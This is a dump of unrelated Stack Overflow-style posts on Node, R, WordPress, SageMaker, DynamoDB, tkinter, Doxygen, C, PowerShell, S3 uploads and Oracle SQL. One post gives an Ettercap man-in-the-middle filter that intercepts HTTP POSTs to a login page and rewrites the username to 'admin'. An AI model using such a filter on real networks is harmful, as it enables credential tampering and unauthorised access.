You have to use the `node:querystring` module to build query params. I assume you are using CommonJS; if you use ESM, simply change the import.
According to [RFC 7231 section 3.1.1.5](https://www.rfc-editor.org/rfc/rfc7231#section-3.1.1.5), the
**`Content-Type`** HTTP header should be set only for PUT and POST requests; it is not required for GET requests.
```js
const queryBuilder = require('node:querystring');
const params = queryBuilder.stringify({arr: [1, 2]}); // gives arr=1&arr=2
let request = await Request.get('url?' + params);
```
[NODEJS DOC](https://nodejs.org/api/querystring.html)
|
I'm trying to get this Ettercap filter to work. It has worked in the past, but it seems Ettercap no longer accepts it. It's supposed to change the submitted username to admin:
```
if (ip.dst == '192.###.##.#' && tcp.dst == 80) {
   if (search(DATA.data, "POST")) {
      msg("request POST");
      if (search(DATA.data, "login.php")) {
         msg("Call to the login page");
         pcre_regex(DATA.data, "Content-Length: [0-9]*", "Content-Length: 41");
         msg("Content modified");
         if (pcre_regex(DATA.data, "username=[a-zA-Z]*&", "username=admin&")) {
            msg("Data modified\n");
         }
         msg("Done !\n");
      }
   }
}
```
I also tried using replace and execinject; the code runs and the messages are displayed, but nothing gets replaced.
Please help!
Sincerely,
Marco
I have already tried a ton of docs and solutions online and nothing works. :/ |
I am using the sankeyNetwork function to create a diagram of very simple flow data. Even using multiple iterations, the resulting diagram has obviously unnecessary crossovers.
I ran this code in R Studio 2023.06.2+561 with R version 4.3.1 (2023-06-16).
```r
library(networkD3)
source<-c(0,1,2,0)
target<-c(3,3,4,4)
value<-c(13320, 274, 10950, 96000)
links<-data.frame(source, target, value)
nodes<-data.frame(names=c('Solar', 'Wind', 'Natural Gas', 'Electricity', 'Hydrogen'))
p <- sankeyNetwork(Links = links, Nodes = nodes, Source = "source",
Target = "target", Value = "value", NodeID = "names", iterations=32,
units = "TWh", fontSize = 12, nodeWidth = 30, sinksRight = FALSE)
```
The resulting Sankey diagram has an obviously avoidable crossing: if "Wind" were above "Solar", there would be no crossings. I've tried 1000 iterations and it makes no difference, which has me wondering whether the issue is the platform or RStudio, since 1000 iterations should be noticeably slower than 1.
[Resulting Sankey Plot](https://i.stack.imgur.com/cD1sC.png) |
|r|d3.js|sankey-diagram|networkd3| |
In WordPress, when I input a title for a post and save it, a slug is automatically generated based on the title. After searching online, I found that it is implemented via sanitize_title, so I tried to port it to Delphi.
But after checking its source code:
```php
function sanitize_title( $title, $fallback_title = '', $context = 'save' ) {
$raw_title = $title;
if ( 'save' === $context ) {
$title = remove_accents( $title );
}
/**
* Filters a sanitized title string.
*
* @since 1.2.0
*
* @param string $title Sanitized title.
* @param string $raw_title The title prior to sanitization.
* @param string $context The context for which the title is being sanitized.
*/
$title = apply_filters( 'sanitize_title', $title, $raw_title, $context );
if ( '' === $title || false === $title ) {
$title = $fallback_title;
}
return $title;
}
```
I cannot find any code that performs the replacement of whitespace with '-'.
1. remove_accents only removes accents; it is not related to whitespace.
2. apply_filters applies a filter; if no filter is registered, nothing happens.
Other than these two, there is no code that makes the transform. Why? |
To do this, first start your Jupyter instance, then run the on-create script below, which installs the custom Python environment:
https://github.com/aws-samples/amazon-sagemaker-notebook-instance-lifecycle-config-samples/blob/master/scripts/persistent-conda-ebs/on-create.sh
Then add the following to the on-start script of your lifecycle configuration and attach that lifecycle configuration to your notebook instance:
```bash
#!/bin/bash
set -e
#
# PARAMETERS
IDLE_TIME=3600

echo "Fetching the autostop script"
wget https://raw.githubusercontent.com/aws-samples/amazon-sagemaker-notebook-instance-lifecycle-config-samples/master/scripts/auto-stop-idle/autostop.py

echo "Detecting Python install with boto3 install"
# Find which install has boto3 and use that to run the cron command. So will use default when available
# Redirect stderr as it is unneeded
CONDA_PYTHON_DIR=$(source /home/ec2-user/anaconda3/bin/activate /home/ec2-user/anaconda3/envs/JupyterSystemEnv && which python)
PYTHON_DIR='/usr/bin/python'
echo "Found boto3 at $PYTHON_DIR"

echo "Starting the SageMaker autostop script in cron"
(crontab -l 2>/dev/null; echo "*/5 * * * * $PYTHON_DIR $PWD/autostop.py --time $IDLE_TIME --ignore-connections >> /var/log/jupyter.log") | crontab -
#
sudo -u ec2-user -i <<'EOF'
unset SUDO_UID
WORKING_DIR=/home/ec2-user/SageMaker/custom-miniconda/
source "$WORKING_DIR/miniconda/bin/activate"
for env in $WORKING_DIR/miniconda/envs/*; do
    BASENAME=$(basename "$env")
    source activate "$BASENAME"
    python -m ipykernel install --user --name "$BASENAME" --display-name "Custom ($BASENAME)"
done
# Optionally, uncomment these lines to disable SageMaker-provided Conda functionality.
# echo "c.EnvironmentKernelSpecManager.use_conda_directly = False" >> /home/ec2-user/.jupyter/jupyter_notebook_config.py
# rm /home/ec2-user/.condarc
EOF

echo "Restarting the Jupyter server.."
systemctl restart jupyter-server
```
|
How to implement the following COUNTIF function into POWER BI? |
|excel|powerbi| |
I have the following data
| Partition key | Sort key | value |
| ------------- | -------- | ----- |
| aa | str1 | 1 |
| aa | str2 | 123 |
| aa | str3 | 122 |
| ab | str1 | 12 |
| ab | str3 | 111 |
| ac | str1 | 112 |
And by using `QueryRequest` I want to select entries where the partition key is "aa" and the sort key is either "str1" or "str3". I have tried to create a `Condition`, but nothing works with different exceptions, so could someone point out how this query can be written?
```cs
var pkCondition = new Condition
{
ComparisonOperator = ComparisonOperator.EQ,
AttributeValueList =
{
new AttributeValue { S = "aa" },
},
};
// Exception One or more parameter values were invalid: Condition parameter type does not match schema type
var skCondition1 = new Condition
{
ComparisonOperator = ComparisonOperator.EQ,
AttributeValueList =
{
new AttributeValue { SS = { "str1", "str3" } },
},
};
// Exception: One or more parameter values were invalid: Invalid number of argument(s) for the EQ ComparisonOperator
var skCondition2 = new Condition
{
ComparisonOperator = ComparisonOperator.EQ,
AttributeValueList =
{
new AttributeValue { S = "str1" },
new AttributeValue { S = "str3" },
},
};
// Well this one is clear because IN cannot be performed on keys
// Exception: One or more parameter values were invalid: ComparisonOperator IN is not valid for SS AttributeValue type
var skCondition3 = new Condition
{
ComparisonOperator = ComparisonOperator.IN,
AttributeValueList =
{
new AttributeValue { SS = { "str1", "str3" } },
},
};
// Works, but not what I need
var skCondition4 = new Condition
{
ComparisonOperator = ComparisonOperator.EQ,
AttributeValueList =
{
new AttributeValue { S = "str1" },
},
};
return new QueryRequest
{
TableName = "My table",
KeyConditions =
{
{ "Partition key", pkCondition },
{ "Sort key", skCondition },
},
};
```
After some research I found out that `KeyConditionExpression` can also be used, but I have not found any combination that works for my case.
```cs
// Exception: Invalid operator used in KeyConditionExpression: OR
const string keyConditionExpression1 = "#pk = :pkval AND (#sk = :sk1 OR #sk = :sk2)";
// Exception: Invalid operator used in KeyConditionExpression: IN
const string keyConditionExpression2 = "#pk = :pkval AND #sk IN (:sk1, :sk2)";
new QueryRequest
{
TableName = "My table",
KeyConditionExpression = keyConditionExpression,
ExpressionAttributeNames = new Dictionary<string, string>
{
{ "#pk", "Partition key" },
{ "#sk", "Sort key" },
},
ExpressionAttributeValues = new Dictionary<string, AttributeValue>
{
{ ":pkval", new AttributeValue { S = "aa" } },
{ ":sk1", new AttributeValue { S = "str1" } },
{ ":sk2", new AttributeValue { S = "str3" } },
},
};
```
Next, I have also tried using `FilterExpression` where IN and OR are allowed, but again there was another exception: `Filter Expression can only contain non-primary key attributes`.
```cs
new QueryRequest
{
TableName = "My table",
KeyConditionExpression = "#pk = :pkval",
FilterExpression = "#sk IN (:sk1, :sk2)",
ExpressionAttributeNames = new Dictionary<string, string>
{
{ "#pk", "Partition key" },
{ "#sk", "Sort key" },
},
ExpressionAttributeValues = new Dictionary<string, AttributeValue>
{
{ ":pkval", new AttributeValue { S = "aa" } },
{ ":sk1", new AttributeValue { S = "str1" } },
{ ":sk2", new AttributeValue { S = "str3" } },
},
};
```
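For what it's worth, the behavior above matches DynamoDB's documented rule: a key condition may test the sort key against only a single value or range (`=`, `BETWEEN`, `begins_with`), never `IN`/`OR`, and a `FilterExpression` may not reference key attributes. One workaround is `BatchGetItem`, listing each full primary key explicitly. Here is a sketch of the request shape as plain dictionaries (not tied to the .NET SDK; the helper name is mine):

```python
def batch_get_request(table, pk, sort_keys):
    """Build a BatchGetItem payload fetching specific (pk, sk) pairs."""
    return {
        "RequestItems": {
            table: {
                "Keys": [
                    {"Partition key": {"S": pk}, "Sort key": {"S": sk}}
                    for sk in sort_keys
                ]
            }
        }
    }

request = batch_get_request("My table", "aa", ["str1", "str3"])
print(request)
```

The equivalent could be issued with the .NET SDK's `BatchGetItemRequest`, or simply as two separate `Query`/`GetItem` calls.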
EDIT:
Giving it another thought: maybe my table structure is simply not correct for this access pattern. Perhaps I should go with a "Partition key"-only primary key, where the current "Sort key" is no longer part of the key but a normal attribute that can then be used in `FilterExpression`. I will test it. |
I have a simple UI which should print every key that I press.
I need the signal to be generated **once** per real key press.
How can I achieve that?
By default, tkinter generates the signal once, then waits about 0.5 seconds and starts generating the signal in a loop until the *KeyRelease* event happens.
```python
if __name__ == '__main__':
from tkinter import Tk, Frame
root = Tk()
frame = Frame(root, width=200, height=200, bg="white")
frame.pack()
def key_handler(event):
print(event.char, event.keysym, event.keycode)
return 'break'
root.bind('<Key>', key_handler)
root.mainloop()
```
Returning 'break' at the end of the bound function doesn't stop the next event call.
In addition (because this is a minor question, too small for a separate post), how can I handle these key sequences?:
- "Shift" and some digit
- some digit and '+' or '-' symbol
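Regarding the auto-repeat problem: one common workaround (a sketch of the bookkeeping only, independent of tkinter, so all names here are mine) is to track which keysyms are currently held and ignore repeated `<Key>` events until the matching `<KeyRelease>` arrives:

```python
class KeyDebouncer:
    """Report a key press only once until its release is seen."""

    def __init__(self):
        self._held = set()

    def on_press(self, keysym):
        # Auto-repeat fires <Key> again while the key is held; drop those.
        if keysym in self._held:
            return False
        self._held.add(keysym)
        return True

    def on_release(self, keysym):
        self._held.discard(keysym)


deb = KeyDebouncer()
print(deb.on_press("a"))   # True  (first press)
print(deb.on_press("a"))   # False (auto-repeat)
deb.on_release("a")
print(deb.on_press("a"))   # True  (pressed again)
```

Caveat: on X11, auto-repeat can also emit synthetic KeyRelease/KeyPress pairs, so this may need to be paired with a small timer; treat it as a starting point rather than a complete fix.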
|
How to generate a single key-press event signal with tkinter.bind method |
|python|python-3.x|user-interface|tkinter|signals| |
I'm documenting a (C++) library of mine with doxygen comments.
In this library, I have some cases of overloads of the same function, doing the same thing but with different inputs, e.g.
```
void frobincate(int x);
void frobincate(float f);
```
I've noticed Doxygen has group begin and end commands, `///@{` and `///@}`, and so I naively write:
```
/// @brief Perform frobnication
/// @param s just some string
///@{
/// @param x an important value
void frobincate(char const* s, int x);
/// @param f a magical value
void frobincate(char const* s, float f);
///@}
```
However, looking at the doxygen [documentation for this kind of grouping][1] and the [generated output sample][2], it seems that the group-level commands I specified do not apply to _any_ group members - just to the group-level documentation. And, in fact, I am not interested in drawing special attention to `frobnicate()` - it's simply a function with more than a single possible type combination of input parameters.
Is there a way for me to not-repeat-myself w.r.t. function documentation, on one hand, but have that documentation text be applied to the actual function, on the other? Or must I resort to copy-and-paste?
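One mechanism worth knowing about, separate from member groups, is Doxygen's `\copydoc` command, which copies another member's documentation into place. Applied to the example above it would look roughly like this (syntax as per the Doxygen manual; untested here, and it still leaves one overload as the "master" copy):

```
/// @brief Perform frobnication
/// @param s just some string
/// @param x an important value
void frobincate(char const* s, int x);

/// @copydoc frobincate(char const*, int)
/// @param f a magical value
void frobincate(char const* s, float f);
```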
[1]: https://www.doxygen.nl/manual/grouping.html#memgroup
[2]: https://www.doxygen.nl/manual/examples/memgrp/html/class_memgrp___test.html |
How can I avoid repeating myself in doxygen comments (unfortunately without member groups)? |
|c++|doxygen|dry|doxygen-member-groups| |
How to fix org.apache.commons.fileupload.FileUploadBase and SizeLimitExceededException in Struts 2 |
C:\Users\VssAdministrator\Downloads is the correct path for anyone else who might need to know this! |
Here's a PowerShell script and an AutoHotkey script based on lulle2007200's and MaloW's answers.
SetBrightness.ps1
```powershell
param(
    [Parameter(Mandatory = $true, Position = 0,
               HelpMessage = "Brightness value between 1.0 and 6.0")]
    [ValidateRange(1.0, 6.0)][double]$brightness
)

Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;

public class ScreenBrightnessSetter
{
    [DllImport("user32.dll")]
    public static extern IntPtr MonitorFromWindow(IntPtr hwnd, uint dwFlags);

    [DllImport("kernel32", CharSet = CharSet.Unicode)]
    public static extern IntPtr LoadLibrary(string lpFileName);

    [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true,
               SetLastError = true)]
    public static extern IntPtr GetProcAddress(IntPtr hModule, int address);

    public delegate void DwmpSDRToHDRBoostPtr(IntPtr monitor,
                                              double brightness);
}
"@

$primaryMonitor = [ScreenBrightnessSetter]::MonitorFromWindow([IntPtr]::Zero, 1)
$hmodule_dwmapi = [ScreenBrightnessSetter]::LoadLibrary("dwmapi.dll")
$procAddress = [ScreenBrightnessSetter]::GetProcAddress($hmodule_dwmapi, 171)
$changeBrightness = (
    [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(
        $procAddress, [ScreenBrightnessSetter+DwmpSDRToHDRBoostPtr])
)
$changeBrightness.Invoke($primaryMonitor, $brightness)
```
SetBrightness.ahk
```autohotkey
#Requires AutoHotkey v2.0

SetBrightness(value) {
    cmd := 'powershell.exe -ExecutionPolicy Bypass -Command '
    cmd .= '"& .\SetBrightness.ps1 ' . value . '"'
    RunWait cmd, A_ScriptDir, "Hide"
}

>^>+1::SetBrightness(1)
>^>+2::SetBrightness(2)
>^>+3::SetBrightness(3)
>^>+4::SetBrightness(4)
>^>+5::SetBrightness(5)
>^>+6::SetBrightness(6)
```
|
```c
#include <stdio.h>

#define N 10

int main() {
    int a[N], i, pos;

    printf("\n\nΕισαγωγή 10 ακεραίων\n");
    for (i = 0; i < N; i++) {
        printf("%2d : ", i + 1);
        scanf("%d", &a[i]);
    }

    pos = 0;
    for (i = 1; i < N; i++) {
        if (a[pos] < a[i]) {
            pos = i;
        }
    }

    printf("\n\nΗ μέγιστη τιμή είναι %d και βρέθηκε στη θέση %d\n\n", a[pos], pos + 1);
    return 0;
}
```
This is the program/code found in my e-class lectures. The first thing that literally makes no sense to me is the `i++` update expression (I don't know what it is called in English) appearing in both `for` statements: since there are two `for` loops, plus the `i+1` inside the first loop's `printf`, I would logically expect `i` to be increased twice, or even three times, on every pass until it reaches N. Logically that is what should happen, but when I run the program it doesn't, and it operates exactly as we want and expect it to.
Furthermore, I have questions about `a[pos]`, which at the start is `a[0]`, and about `pos+1`. Since there is no position 0 and the `printf` starts counting from `i+1`, what is position 0 and what is its value? Is `i=1` position 0? And since we have `pos=i`, why does the final `printf` print one position after it, with `pos+1`? Considering that every time the value `a[pos]` is smaller than `a[i]`, the position becomes equal to `i`.
This is the sum of my queries.
|
Formkit auto-animate doesn't work on my list.
My main.js:
> import { createApp } from 'vue';
> import App from './App.vue';
> import './styles/app.css';
> import components from '@/components/UI';
> import router from '@/router/index.js';
> import store from '@/store';
> import { autoAnimatePlugin } from '@formkit/auto-animate/vue'
>
> const app = createApp(App)
>
> components.forEach(component => {
> app.component(component.name, component)
> })
>
> app
> .use(autoAnimatePlugin)
> .use(router)
> .use(store)
> .mount('#app');
List:
> <div v-auto-animate>
> <HospitalItem v-for="hospital in hospitals" :hospital="hospital" :key="hospital._id"
> @deleteHospital="deleteEmit"> </HospitalItem>
> </div>
Please help me to fix this |
Formkit autoanimate doesn't work on my LIST |
|javascript|vue.js|animation|formkit| |
I finally was able to fix the errors from DigitalOcean's own script.
Here is a **working** curl command:
```bash
space="nmmm-test"
REGION="ams3"
STORAGETYPE="STANDARD" # Storage type, can be STANDARD, REDUCED_REDUNDANCY, etc.
KEY="xxxx"
SECRET="xxxxxx"

path="/home/nmmm/"
file="despicable-me-2-minions_a-G-10438535-0.jpg"
space_path="/"

date=$(date +"%a, %d %b %Y %T %z")
acl="x-amz-acl:public-read" # private or public-read.
content_type="image/jpeg"
storage_type="x-amz-storage-class:${STORAGETYPE}"

string="PUT\n\n$content_type\n$date\n$acl\n$storage_type\n/$space$space_path$file"
signature=$(echo -en "${string}" | openssl sha1 -hmac "${SECRET}" -binary | base64)

curl -v -s -X PUT -T "$path/$file" \
    -H "Host: $space.${REGION}.digitaloceanspaces.com" \
    -H "Date: $date" \
    -H "Content-Type: $content_type" \
    -H "$storage_type" \
    -H "$acl" \
    -H "Authorization: AWS ${KEY}:$signature" \
    "https://$space.${REGION}.digitaloceanspaces.com$space_path$file"
```
After that, I wrote a working PHP class:
```php
<?php
class S3Uploader {
    private $s3_host; // ams3.digitaloceanspaces.com
    private $s3_key;
    private $s3_secret;
    private $s3_bucket;
    private $s3_storage_class;
    private $s3_acl;

    const ACL_PRIVATE = "private";
    const ACL_PUBLIC = "public-read";
    const SC_STANDARD = "STANDARD";
    const DEBUG = false;

    function __construct($s3_host, $s3_key, $s3_secret, $s3_bucket){
        $this->s3_host = $s3_bucket . "." . $s3_host;
        $this->s3_key = $s3_key;
        $this->s3_secret = $s3_secret;
        $this->s3_bucket = $s3_bucket;
        $this->s3_storage_class = self::SC_STANDARD;
        $this->s3_acl = self::ACL_PUBLIC;
    }

    function setStorageClass($s3_storage_class){
        // STANDARD, REDUCED_REDUNDANCY, etc.
        $this->s3_storage_class = $s3_storage_class;
    }

    function setAcl($acl){
        // "private" or "public-read"
        $this->s3_acl = $acl;
    }

    function setAclBool($acl){
        if ($acl)
            return $this->setAcl(self::ACL_PUBLIC);
        else
            return $this->setAcl(self::ACL_PRIVATE);
    }

    private static function date(){
        return strftime("%a, %d %b %Y %T %z");
    }

    function uploadFile($src_file, $dst_file, $content_type){
        $date = $this->date();

        // space after : is omitted intentionally!!!
        $acl = "x-amz-acl:" . $this->s3_acl;
        $storage_class = "x-amz-storage-class:" . $this->s3_storage_class;

        $string = "PUT\n" .
                  "\n" .
                  "$content_type\n" .
                  "$date\n" .
                  "$acl\n" .
                  "$storage_class\n" .
                  "/" . $this->s3_bucket . $dst_file
        ;

        $signature = base64_encode(
            hash_hmac("sha1", $string, $this->s3_secret, true)
        );

        $curl_headers = [
            "Host:" . $this->s3_host,
            "Date:" . $date,
            "Content-Type:" . $content_type,
            $acl,
            $storage_class,
            "Authorization:" . "AWS " . $this->s3_key . ":" . $signature
        ];

        $curl_url = "https://" . $this->s3_host . $dst_file;
        $file_contents = file_get_contents($src_file);

        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $curl_url);
        curl_setopt($curl, CURLOPT_CUSTOMREQUEST, "PUT");
        curl_setopt($curl, CURLOPT_POSTFIELDS, $file_contents);
        curl_setopt($curl, CURLOPT_HTTPHEADER, $curl_headers);
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        if (self::DEBUG){
            curl_setopt($curl, CURLOPT_HEADER, true);
            curl_setopt($curl, CURLOPT_VERBOSE, true);
        }

        $result = curl_exec($curl);
        if ($result === false) {
            // capture error details before closing the handle
            $errno = curl_errno($curl);
            $error = curl_error($curl);
            @curl_close($curl);
            // int is more readable in print_r
            return [
                "ok" => 0,
                "http_code" => 0,
                "curl_error" => $errno,
                "message" => $error
            ];
        } else {
            $code = curl_getinfo($curl, CURLINFO_HTTP_CODE);
            $errno = curl_errno($curl);
            @curl_close($curl);
            // int is more readable in print_r
            return [
                "ok" => $code == 200 ? 1 : 0,
                "http_code" => $code,
                "curl_error" => $errno,
                "message" => $code == 200 ? "" : $result
            ];
        }
    }
};

$s3 = new S3Uploader("ams3.digitaloceanspaces.com", "xxxxx", "xxxxxx", "nmmm-test");
$r = $s3->uploadFile("/home/nmmm/despicable-me-2-minions_a-G-10438535-0.jpg", "/minion.jpg", "image/jpeg");
print_r($r);
```
|
I get an error in useRouteQuery and Vitest. How to solve? |
|javascript|vue.js|testing|vuejs3|vitest| |
|gigya|sap| |
If you have the two tables either both in the Oracle database, or have the MariaDB table accessible from the Oracle database (e.g. via a database link), then you can find all the relationships between the two tables using this query:
```lang-sql
WITH cardboard_bounds (id, cardboard_number, start_dt, end_dt, production_line) AS (
SELECT id,
cardboard_number,
date_time,
LEAD(date_time, 1, SYSTIMESTAMP) OVER (
PARTITION BY productionline_number
ORDER BY date_time
),
productionline_number
FROM cardboard
),
production_bounds (production_number, posnr, process_active, production_line, start_dt, end_dt) AS (
SELECT PRODUCTION_NUMBER,
POSNR,
PROCESS_ACTIVE,
PRODUCTION_LINE,
DATETIME as start_dt,
LEAD(DATETIME, 1, SYSTIMESTAMP) OVER (
PARTITION BY production_line
ORDER BY DATETIME ASC
) AS end_dt
FROM productions
)
SELECT p.production_number,
p.posnr,
p.process_active,
p.production_line,
GREATEST(p.start_dt, c.start_dt) AS start_dt,
LEAST(p.end_dt, c.end_dt) AS end_dt,
c.id,
c.cardboard_number
FROM production_bounds p
INNER JOIN cardboard_bounds c
ON p.production_line = c.production_line
AND p.start_dt < c.end_dt AND p.end_dt > c.start_dt
```
Which, for the sample data:
```lang-sql
CREATE TABLE cardboard
(
id int,
Cardboard_Number varchar2(100),
date_Time TIMESTAMP(0),
ProductionLine_Number int
);
INSERT INTO cardboard VALUES
(2,'WDL-005943998-1', TIMESTAMP '2014-08-05 10:03:32', 1),
(4,'spL1ml82N4o',TIMESTAMP '2024-02-29 17:13:54', 1),
(5,'WDL-005943998-1',TIMESTAMP '2024-03-01 09:44:42', 1),
(6,'WDL-005943998-1',TIMESTAMP '2024-03-01 10:34:57', 1),
(7,'950024027237',TIMESTAMP '2024-03-01 10:44:57', 1),
(8,'950024027237',TIMESTAMP '2024-03-01 10:52:57', 1),
(9,'WDL-005943998-1',TIMESTAMP '2024-03-01 13:58:43', 2),
(10,'WDL-005943998-1',TIMESTAMP '2024-03-01 13:58:46', 2),
(11,'spL1ml82N4o',TIMESTAMP '2024-03-01 14:09:43', 2),
(12,'WDL-005943998-1',TIMESTAMP '2024-03-12 15:48:36', 2);
CREATE TABLE Productions
(
PRODUCTION_NUMBER NUMBER,
POSNR NUMBER,
DATETIME TIMESTAMP(0),
PROCESS_ACTIVE VARCHAR2(1),
PRODUCTION_LINE NUMBER
);
BEGIN
INSERT INTO Productions(PRODUCTION_NUMBER, POSNR, DATETIME, PROCESS_ACTIVE, PRODUCTION_LINE)
VALUES (461793, 1, TO_TIMESTAMP('2014-08-04 09:01:41', 'YYYY-MM-DD HH24:MI:SS'), '1', 1);
INSERT INTO Productions(PRODUCTION_NUMBER, POSNR, DATETIME, PROCESS_ACTIVE, PRODUCTION_LINE)
VALUES (461793, 1, TO_TIMESTAMP('2014-08-04 11:01:41', 'YYYY-MM-DD HH24:MI:SS'), '0', 1);
INSERT INTO Productions(PRODUCTION_NUMBER, POSNR, DATETIME, PROCESS_ACTIVE, PRODUCTION_LINE)
VALUES (461618, 2, TO_TIMESTAMP('2014-08-05 10:01:41', 'YYYY-MM-DD HH24:MI:SS'), '1', 1);
INSERT INTO Productions(PRODUCTION_NUMBER, POSNR, DATETIME, PROCESS_ACTIVE, PRODUCTION_LINE)
VALUES (461619, 2, TO_TIMESTAMP('2014-08-05 10:02:46', 'YYYY-MM-DD HH24:MI:SS'), '1', 2);
INSERT INTO Productions(PRODUCTION_NUMBER, POSNR, DATETIME, PROCESS_ACTIVE, PRODUCTION_LINE)
VALUES (461618, 2, TO_TIMESTAMP('2014-08-05 10:05:09', 'YYYY-MM-DD HH24:MI:SS'), '0', 1);
INSERT INTO Productions(PRODUCTION_NUMBER, POSNR, DATETIME, PROCESS_ACTIVE, PRODUCTION_LINE)
VALUES (461619, 2, TO_TIMESTAMP('2014-08-05 10:07:46', 'YYYY-MM-DD HH24:MI:SS'), '0', 2);
INSERT INTO Productions(PRODUCTION_NUMBER, POSNR, DATETIME, PROCESS_ACTIVE, PRODUCTION_LINE)
VALUES (461818, 1, TO_TIMESTAMP('2014-08-14 22:53:12', 'YYYY-MM-DD HH24:MI:SS'), '1', 1);
INSERT INTO Productions(PRODUCTION_NUMBER, POSNR, DATETIME, PROCESS_ACTIVE, PRODUCTION_LINE)
VALUES (461818, 1, TO_TIMESTAMP('2014-08-14 23:25:30', 'YYYY-MM-DD HH24:MI:SS'), '0', 1);
END;
/
```
Outputs:
| PRODUCTION\_NUMBER | POSNR | PROCESS\_ACTIVE | PRODUCTION\_LINE | START\_DT | END\_DT | ID | CARDBOARD\_NUMBER |
| -----------------:|-----:|:--------------|---------------:|:--------|:------|--:|:----------------|
| 461618 | 2 | 1 | 1 | 2014-08-05 10:03:32. | 2014-08-05 10:05:09.000000 | 2 | WDL-005943998-1 |
| 461618 | 2 | 0 | 1 | 2014-08-05 10:05:09. | 2014-08-14 22:53:12.000000 | 2 | WDL-005943998-1 |
| 461818 | 1 | 1 | 1 | 2014-08-14 22:53:12. | 2014-08-14 23:25:30.000000 | 2 | WDL-005943998-1 |
| 461818 | 1 | 0 | 1 | 2014-08-14 23:25:30. | 2024-02-29 17:13:54.000000 | 2 | WDL-005943998-1 |
| 461818 | 1 | 0 | 1 | 2024-02-29 17:13:54. | 2024-03-01 09:44:42.000000 | 4 | spL1ml82N4o |
| 461818 | 1 | 0 | 1 | 2024-03-01 09:44:42. | 2024-03-01 10:34:57.000000 | 5 | WDL-005943998-1 |
| 461818 | 1 | 0 | 1 | 2024-03-01 10:34:57. | 2024-03-01 10:44:57.000000 | 6 | WDL-005943998-1 |
| 461818 | 1 | 0 | 1 | 2024-03-01 10:44:57. | 2024-03-01 10:52:57.000000 | 7 | 950024027237 |
| 461818 | 1 | 0 | 1 | 2024-03-01 10:52:57. | 2024-03-28 12:20:50.832254 | 8 | 950024027237 |
| 461619 | 2 | 0 | 2 | 2024-03-01 13:58:43. | 2024-03-01 13:58:46.000000 | 9 | WDL-005943998-1 |
| 461619 | 2 | 0 | 2 | 2024-03-01 13:58:46. | 2024-03-01 14:09:43.000000 | 10 | WDL-005943998-1 |
| 461619 | 2 | 0 | 2 | 2024-03-01 14:09:43. | 2024-03-12 15:48:36.000000 | 11 | spL1ml82N4o |
| 461619 | 2 | 0 | 2 | 2024-03-12 15:48:36. | 2024-03-28 12:20:50.832254 | 12 | WDL-005943998-1 |
If you want to search for active rows with a specific `cardboard_number` then add those filters:
```lang-sql
WITH cardboard_bounds (id, cardboard_number, start_dt, end_dt, production_line) AS (
SELECT id,
cardboard_number,
date_time,
LEAD(date_time, 1, SYSTIMESTAMP) OVER (
PARTITION BY productionline_number
ORDER BY date_time
),
productionline_number
FROM cardboard
),
production_bounds (production_number, posnr, process_active, production_line, start_dt, end_dt) AS (
SELECT PRODUCTION_NUMBER,
POSNR,
PROCESS_ACTIVE,
PRODUCTION_LINE,
DATETIME as start_dt,
LEAD(DATETIME, 1, SYSTIMESTAMP) OVER (
PARTITION BY production_line
ORDER BY DATETIME ASC
) AS end_dt
FROM productions
)
SELECT p.production_number,
p.posnr,
p.process_active,
p.production_line,
GREATEST(p.start_dt, c.start_dt) AS start_dt,
LEAST(p.end_dt, c.end_dt) AS end_dt,
c.id,
c.cardboard_number
FROM production_bounds p
INNER JOIN cardboard_bounds c
ON p.production_line = c.production_line
AND p.start_dt < c.end_dt AND p.end_dt > c.start_dt
WHERE cardboard_number = 'WDL-005943998-1'
AND process_active = 1
```
Which outputs:
| PRODUCTION\_NUMBER | POSNR | PROCESS\_ACTIVE | PRODUCTION\_LINE | START\_DT | END\_DT | ID | CARDBOARD\_NUMBER |
| -----------------:|-----:|:--------------|---------------:|:--------|:------|--:|:----------------|
| 461618 | 2 | 1 | 1 | 2014-08-05 10:03:32. | 2014-08-05 10:05:09.000000 | 2 | WDL-005943998-1 |
| 461818 | 1 | 1 | 1 | 2014-08-14 22:53:12. | 2014-08-14 23:25:30.000000 | 2 | WDL-005943998-1 |
[fiddle](https://dbfiddle.uk/jHkQWqLt)
|
If the software that you use to open the content allows opening anything other than a file, then yes. It may be a named or unnamed pipe, shared memory, an OLE IStream interface, etc.
Otherwise it may be complicated but [still possible][1].
In the worst case you can use ordinary temporary files, but do not forget to use the flags FILE_FLAG_DELETE_ON_CLOSE and FILE_ATTRIBUTE_TEMPORARY to avoid polluting the file system.
[1]: https://learn.microsoft.com/en-us/windows/win32/projfs/projected-file-system |
**Solution:**

```js
var keyValueObjectArray = [
  { key: "foo", val: "bar" },
  { key: "hello", val: "world" },
];

// array of [key, value] pairs
var keyValueArray = keyValueObjectArray.map((elm) => [elm.key, elm.val]);
//console.log(keyValueArray);

// array to map
var keyValueMap = new Map(keyValueArray);
//console.log(keyValueMap);

// map to object
var result = {};
for (const [key, value] of keyValueMap) {
  result[key] = value;
}
console.log(result);
```

**Output:**

```
{ foo: 'bar', hello: 'world' }
```
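On newer runtimes (ES2019+, an assumption about your environment), the Map detour can be skipped entirely with `Object.fromEntries`:

```javascript
const keyValueObjectArray = [
  { key: "foo", val: "bar" },
  { key: "hello", val: "world" },
];

// Object.fromEntries consumes [key, value] pairs (or a Map) directly.
const result = Object.fromEntries(
  keyValueObjectArray.map((elm) => [elm.key, elm.val])
);

console.log(result); // { foo: 'bar', hello: 'world' }
```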
|
I have a nested Data structure in my DynamoDB Table that looks like this
```
"filter": {
"M": {
"foo": {
"NS": [
"2"
]
},
"bar": {
"NS": [
"456"
]
},
"basz": {
"NS": [
"0"
]
},
"fool": {
"NS": [
"2"
]
},
"version": {
"SS": [
"VersionBest"
]
}
}
},
```
and created a Dynamoose Schema like this:
```
filter: {
type: Object,
schema: {
foo: {
type: Set,
schema: [Number],
},
bar: {
type: Set,
schema: [Number],
},
basz: {
type: Set,
schema: [Number],
},
fool: {
type: Set,
schema: [Number],
},
version: {
type: Set,
schema: [String],
},
},
},
```
When I perform a scan via the Model i do not get the data from the sets. Instead it is empty like this:
```
"filter": {
"foo": {},
"bar": {},
"basz": {},
"fool": {},
"version": {}
},
```
